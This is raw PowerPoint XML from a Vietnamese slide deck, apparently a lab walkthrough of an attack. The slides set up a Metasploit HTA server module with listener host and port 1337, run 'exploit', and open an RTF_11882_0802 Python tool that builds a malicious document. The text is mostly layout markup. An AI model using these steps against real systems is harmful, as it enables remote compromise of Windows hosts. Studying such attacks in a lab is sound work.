            <a:ext cx="9832138" cy="4164200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151981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5596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sử dụng HTA Server bằng lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>use exploit/windows/misc/hta_server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BA3E33B-D277-46AD-831E-ED78DC2778C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="706551" y="1861858"/>
            <a:ext cx="10686584" cy="733560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D596C93E-7088-4224-8932-C1497B64C58F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531815" y="2756954"/>
            <a:ext cx="11313093" cy="2152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Tiếp theo tôi sẽ set LHOST bằng ip của tôi: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>set LHOST 169.254.237.110</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là LPORT, tôi lấy cỗng 1337: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>set LPORT 1337</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Cuối cùng là Server Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>set srvhost 169.254.237.110</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Bây giờ tôi sẽ chạy lệnh tấn công: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>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10061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DDBAC4-6DBD-48E9-B6F3-18C54F7854DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="774260" y="1930400"/>
            <a:ext cx="10477225" cy="2835564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362047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5E489F-4C45-49D5-842D-B24CA1D766F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397163" y="233310"/>
            <a:ext cx="659476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b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Quá</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trình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tấn</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công</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">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FACE4D5B-FF54-4E19-AD2C-0DDCCA7A1526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531816" y="1034372"/>
            <a:ext cx="11313093" cy="27294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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>2. B2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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Ở trang Terminal thứ 2 này tôi sẽ truy cập vào file python RTF_11882_0802 để tạo ra file để tấn công. Tôi lưu ở mục Videos nên lệnh của tôi sẽ là: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>cd Videos/RTF_11882_0802-master/RTF_11882_0802-master/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Tôi sẽ kiểm tra danh sách tệp bao gồm 3 file: Readme.md, License và RTF_11882_0802.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667FE0B0-BF9F-4332-B44C-03E137AE5952}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397163" y="4324937"/>
            <a:ext cx="11641278" cy="450263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118231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807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青木 大介</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-15T04:34:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-15T04:42:59Z</dcterms:modified>
</cp:coreProperties>
</file>